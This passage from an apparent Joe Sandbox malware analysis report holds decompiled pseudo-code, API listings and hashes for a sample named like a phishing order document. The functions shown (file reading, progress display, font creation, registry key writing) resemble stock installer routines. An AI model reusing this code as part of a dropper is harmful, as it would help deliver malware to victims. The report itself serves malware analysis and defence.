															 *(__ebp - 0x3c) =  ~( *(__ebp - 0x3c));
															__eax = SetFilePointer( *(__ebp - 0x14),  ~( *(__ebp - 0x3c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0x10);
															 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
															 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
														 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														 *(__ebp - 8) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 0xc);
							} while ( *(__ebp - 0xc) <  *(__ebp - 0x48));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}







                                                0x004025e7
                                                0x004025ea
                                                0x004025ec
                                                0x004025ef
                                                0x004025f4
                                                0x004025f7
                                                0x004025fa
                                                0x00402a4c
                                                0x00402a4f
                                                0x00402600
                                                0x00402600
                                                0x00402607
                                                0x00402609
                                                0x00402609
                                                0x0040260f
                                                0x00402773
                                                0x00402773
                                                0x00402776
                                                0x0040277b
                                                0x004015ae
                                                0x0040281e
                                                0x0040281e
                                                0x00000000
                                                0x00402615
                                                0x00402616
                                                0x00402621
                                                0x00402624
                                                0x00402630
                                                0x00402634
                                                0x004026cc
                                                0x004026e4
                                                0x004026f4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040263a
                                                0x0040263a
                                                0x0040263d
                                                0x0040263e
                                                0x00402641
                                                0x00402646
                                                0x0040264d
                                                0x00402655
                                                0x00000000
                                                0x0040265b
                                                0x0040265b
                                                0x00402660
                                                0x00000000
                                                0x00402666
                                                0x00402666
                                                0x0040266e
                                                0x00402671
                                                0x00402674
                                                0x0040272f
                                                0x00402736
                                                0x0040267a
                                                0x00402680
                                                0x0040268c
                                                0x004026f6
                                                0x004026f6
                                                0x0040268e
                                                0x0040268e
                                                0x00402691
                                                0x00402693
                                                0x00402693
                                                0x00402693
                                                0x00402696
                                                0x0040269b
                                                0x0040269e
                                                0x00000000
                                                0x00000000
                                                0x004026a0
                                                0x004026a3
                                                0x004026ab
                                                0x004026b7
                                                0x004026c5
                                                0x00000000
                                                0x004026c7
                                                0x00000000
                                                0x004026c7
                                                0x00000000
                                                0x004026c5
                                                0x00402693
                                                0x004026f9
                                                0x004026fc
                                                0x00000000
                                                0x004026fe
                                                0x00402703
                                                0x00402744
                                                0x00402766
                                                0x0040276d
                                                0x00402752
                                                0x00402752
                                                0x00402758
                                                0x0040275b
                                                0x0040275b
                                                0x00000000
                                                0x0040270c
                                                0x0040270c
                                                0x00402712
                                                0x00402718
                                                0x0040271c
                                                0x0040271f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040271f
                                                0x00402703
                                                0x004026fc
                                                0x00402674
                                                0x00402660
                                                0x00402655
                                                0x00000000
                                                0x00402721
                                                0x00402721
                                                0x00402724
                                                0x0040272d
                                                0x00000000
                                                0x00402624
                                                0x0040260f
                                                0x00402a55
                                                0x00402a5b

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                  • Part of subcall function 00405CE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CFE
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                • Instruction ID: ba8ec8e77c4dae38fecb7239611b9da649e1c788ef9a4e56db7abbfefa36dde0
                                                • Opcode Fuzzy Hash: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                • Instruction Fuzzy Hash: A1512874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72D0DBB999429B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405191 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 984 405191-4051a6 985 4051ac-4051bd 984->985 986 40525d-405261 984->986 987 4051c8-4051d4 lstrlenW 985->987 988 4051bf-4051c3 call 406054 985->988 990 4051f1-4051f5 987->990 991 4051d6-4051e6 lstrlenW 987->991 988->987 993 405204-405208 990->993 994 4051f7-4051fe SetWindowTextW 990->994 991->986 992 4051e8-4051ec lstrcatW 991->992 992->990 995 40520a-40524c SendMessageW * 3 993->995 996 40524e-405250 993->996 994->993 995->996 996->986 997 405252-405255 996->997 997->986
                                                C-Code - Quality: 100%
                                                			E00405191(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a24; // 0x103b4
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8af4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406054(_t38, 0, 0x7a0f20, 0x7a0f20, _a4);
					}
					_t27 = lstrlenW(0x7a0f20);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a08, 0x7a0f20); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f20;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f20[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f20, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                0x00405197
                                                0x004051a1
                                                0x004051a6
                                                0x004051ac
                                                0x004051b7
                                                0x004051ba
                                                0x004051bd
                                                0x004051c3
                                                0x004051c3
                                                0x004051c9
                                                0x004051d1
                                                0x004051d4
                                                0x004051f1
                                                0x004051f5
                                                0x004051fe
                                                0x004051fe
                                                0x00405208
                                                0x00405211
                                                0x0040521d
                                                0x00405224
                                                0x00405228
                                                0x0040522b
                                                0x0040523e
                                                0x0040524c
                                                0x0040524c
                                                0x00405250
                                                0x00405252
                                                0x00405255
                                                0x00000000
                                                0x00405255
                                                0x004051d6
                                                0x004051de
                                                0x004051e6
                                                0x004051ec
                                                0x00000000
                                                0x004051ec
                                                0x004051e6
                                                0x004051d4
                                                0x00405261

                                                APIs
                                                • lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                • lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                • lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                • SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                • Instruction ID: 239aa3d806fe655a10670de66778763bf8aa2df942fa5917c93f0fd796d6fb5a
                                                • Opcode Fuzzy Hash: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                • Instruction Fuzzy Hash: 6E21A171900518BACF119FA5DD849CFBFB9EF85354F10806AF904B6291D7794A50CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 998 401d56-401dd7 GetDC GetDeviceCaps call 402ba2 MulDiv ReleaseDC call 402ba2 call 406054 CreateFontIndirectW 1005 402531 998->1005 1006 402532 1005->1006 1006->1006
                                                C-Code - Quality: 71%
                                                			E00401D56() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0xc));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40cdd0->lfHeight =  ~(MulDiv(E00402BA2(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0xc), _t26);
				 *0x40cde0 = E00402BA2(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x1c));
				 *0x40cde7 = 1;
				 *0x40cde4 = _t13 & 0x00000001;
				 *0x40cde5 = _t13 & 0x00000002;
				 *0x40cde6 = _t13 & 0x00000004;
				E00406054(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x28)));
				_t16 = CreateFontIndirectW(0x40cdd0); // executed
				_push(_t16);
				_push(_t28);
				E00405F79();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                0x00401d5f
                                                0x00401d66
                                                0x00401d81
                                                0x00401d86
                                                0x00401d93
                                                0x00401d98
                                                0x00401da3
                                                0x00401daa
                                                0x00401dbc
                                                0x00401dc2
                                                0x00401dc7
                                                0x00401dd1
                                                0x00402531
                                                0x00401565
                                                0x004029f2
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • GetDC.USER32(?), ref: 00401D59
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                • ReleaseDC.USER32 ref: 00401D86
                                                • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401DD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Tahoma
                                                • API String ID: 3808545654-3580928618
                                                • Opcode ID: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                • Instruction ID: 622cf3373c7b4650c41a942921d5e593d98aece64efbd6d354285906af2a4305
                                                • Opcode Fuzzy Hash: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                • Instruction Fuzzy Hash: 09014F31944640EFE701ABB0AF4ABDA3F74AB66305F104579E641B61E2DA7800059B2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1007 403027-40303e 1008 403040 1007->1008 1009 403047-403050 1007->1009 1008->1009 1010 403052 1009->1010 1011 403059-40305e 1009->1011 1010->1011 1012 403060-403069 call 403235 1011->1012 1013 40306e-40307b call 40321f 1011->1013 1012->1013 1017 403081-403085 1013->1017 1018 40320d 1013->1018 1019 4031b8-4031ba 1017->1019 1020 40308b-4030b1 GetTickCount 1017->1020 1021 40320f-403210 1018->1021 1022 4031fa-4031fd 1019->1022 1023 4031bc-4031bf 1019->1023 1024 403215 1020->1024 1025 4030b7-4030bf 1020->1025 1026 403218-40321c 1021->1026 1027 403202-40320b call 40321f 1022->1027 1028 4031ff 1022->1028 1023->1024 1029 4031c1 1023->1029 1024->1026 1030 4030c1 1025->1030 1031 4030c4-4030d2 call 40321f 1025->1031 1027->1018 1039 403212 1027->1039 1028->1027 1033 4031c4-4031ca 1029->1033 1030->1031 1031->1018 1041 4030d8-4030e1 1031->1041 1036 4031cc 1033->1036 1037 4031ce-4031dc call 40321f 1033->1037 1036->1037 1037->1018 1045 4031de-4031ea call 405cb9 1037->1045 1039->1024 1043 4030e7-403107 call 406527 1041->1043 1048 4031b0-4031b2 1043->1048 1049 40310d-403120 GetTickCount 1043->1049 1051 4031b4-4031b6 1045->1051 1052 4031ec-4031f6 1045->1052 1048->1021 1053 403122-40312a 1049->1053 1054 40316b-40316d 1049->1054 1051->1021 1052->1033 1055 4031f8 1052->1055 1056 403132-403168 MulDiv wsprintfW call 405191 1053->1056 1057 40312c-403130 1053->1057 1058 4031a4-4031a8 1054->1058 1059 40316f-403173 1054->1059 1055->1024 1056->1054 1057->1054 1057->1056 1058->1025 1060 4031ae 1058->1060 1062 403175-40317c call 405cb9 1059->1062 1063 40318a-403195 1059->1063 1060->1024 1068 403181-403183 1062->1068 1066 403198-40319c 1063->1066 1066->1043 1067 4031a2 1066->1067 1067->1024 1068->1051 1069 403185-403188 1068->1069 1069->1066
                                                C-Code - Quality: 95%
                                                			E00403027(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x78f6f8;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403235( *0x7a8a98 + _t62);
				}
				if(E0040321F( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E0040321F(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E0040321F(0x78b6f8, _t97) == 0) {
								goto L41;
							}
							if(E00405CB9(_a8, 0x78b6f8, _t97) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce58 =  *0x40ce58 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce40 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E0040321F(0x78b6f8, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce30 = 0x78b6f8;
						 *0x40ce34 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce38 = _t94;
							 *0x40ce3c = _v12;
							_t74 = E00406527(0x40ce30);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce38; // 0x7924f8
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E00405191(0,  &_v152);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce38; // 0x7924f8
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405CB9(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                0x00403032
                                                0x00403036
                                                0x00403039
                                                0x0040303e
                                                0x00403040
                                                0x00403040
                                                0x00403047
                                                0x0040304b
                                                0x00403050
                                                0x00403052
                                                0x00403052
                                                0x00403059
                                                0x0040305e
                                                0x00403069
                                                0x00403069
                                                0x0040307b
                                                0x0040320d
                                                0x0040320d
                                                0x00000000
                                                0x00403081
                                                0x00403085
                                                0x004031ba
                                                0x004031fd
                                                0x004031ff
                                                0x004031ff
                                                0x0040320b
                                                0x00403212
                                                0x00403215
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040320b
                                                0x004031bf
                                                0x00000000
                                                0x00000000
                                                0x004031c1
                                                0x004031c4
                                                0x004031c7
                                                0x004031ca
                                                0x004031cc
                                                0x004031cc
                                                0x004031dc
                                                0x00000000
                                                0x00000000
                                                0x004031ea
                                                0x004031b4
                                                0x004031b4
                                                0x0040320f
                                                0x0040320f
                                                0x00000000
                                                0x0040320f
                                                0x004031ec
                                                0x004031ef
                                                0x004031f6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031f8
                                                0x00000000
                                                0x004031c4
                                                0x00403091
                                                0x00403093
                                                0x0040309a
                                                0x0040309a
                                                0x004030a1
                                                0x004030a7
                                                0x004030ae
                                                0x004030b1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004030b7
                                                0x004030b7
                                                0x004030b7
                                                0x004030bf
                                                0x004030c1
                                                0x004030c1
                                                0x004030d2
                                                0x00000000
                                                0x00000000
                                                0x004030d8
                                                0x004030db
                                                0x004030e1
                                                0x004030e7
                                                0x004030e7
                                                0x004030f2
                                                0x004030f8
                                                0x004030fd
                                                0x00403104
                                                0x00403107
                                                0x00000000
                                                0x00000000
                                                0x0040310d
                                                0x00403113
                                                0x00403115
                                                0x0040311e
                                                0x00403120
                                                0x00403151
                                                0x00403157
                                                0x00403163
                                                0x00403168
                                                0x00403168
                                                0x0040316d
                                                0x004031a8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040316f
                                                0x00403173
                                                0x0040318a
                                                0x0040318f
                                                0x00403192
                                                0x00403195
                                                0x00403198
                                                0x0040319c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a2
                                                0x0040317c
                                                0x00403183
                                                0x00000000
                                                0x00000000
                                                0x00403185
                                                0x00000000
                                                0x00403185
                                                0x0040316d
                                                0x004031b0
                                                0x00000000
                                                0x004031b0
                                                0x00000000
                                                0x004030b7

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 551687249-2449383134
                                                • Opcode ID: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                • Instruction ID: c5c4fbc020d382a06f3b5c516385cf2f0b989405556926c34d029951a3a1b574
                                                • Opcode Fuzzy Hash: f3ce815b3ce23d87c6a937b6e6d87f9e0afd4b1277b2b64b34a5536ec2ef900c
                                                • Instruction Fuzzy Hash: EC519B31801209EBCB10CFA5DA44B9F7BB8AF55726F1441BBE914B72C1C7789E008BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1070 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1077 4023c7-4023cf 1070->1077 1078 402a4c-402a5b 1070->1078 1079 4023d1-4023de call 402bbf lstrlenW 1077->1079 1080 4023e2-4023e5 1077->1080 1079->1080 1083 4023f5-4023f8 1080->1083 1084 4023e7-4023f4 call 402ba2 1080->1084 1088 402409-40241d RegSetValueExW 1083->1088 1089 4023fa-402404 call 403027 1083->1089 1084->1083 1092 402422-4024fc RegCloseKey 1088->1092 1093 40241f 1088->1093 1089->1088 1092->1078 1095 40281e-402825 1092->1095 1093->1092 1095->1078
                                                C-Code - Quality: 85%
                                                			E0040237B(void* __eax) {
				void* _t17;
				short* _t20;
				int _t21;
				long _t24;
				char _t26;
				int _t29;
				intOrPtr _t37;
				void* _t39;

				_t17 = E00402CB4(__eax);
				_t37 =  *((intOrPtr*)(_t39 - 0x1c));
				 *(_t39 - 0x34) =  *(_t39 - 0x18);
				 *(_t39 - 8) = E00402BBF(2);
				_t20 = E00402BBF(0x11);
				 *(_t39 - 4) = 1;
				_t21 = RegCreateKeyExW(_t17, _t20, _t29, _t29, _t29,  *0x7a8af0 | 0x00000002, _t29, _t39 + 8, _t29); // executed
				if(_t21 == 0) {
					if(_t37 == 1) {
						E00402BBF(0x23);
						_t21 = lstrlenW(0x40b5c8) + _t28 + 2;
					}
					if(_t37 == 4) {
						_t26 = E00402BA2(3);
						 *0x40b5c8 = _t26;
						_t21 = _t37;
					}
					if(_t37 == 3) {
						_t21 = E00403027( *((intOrPtr*)(_t39 - 0x20)), _t29, 0x40b5c8, 0x1800); // executed
					}
					_t24 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 8), _t29,  *(_t39 - 0x34), 0x40b5c8, _t21); // executed
					if(_t24 == 0) {
						 *(_t39 - 4) = _t29;
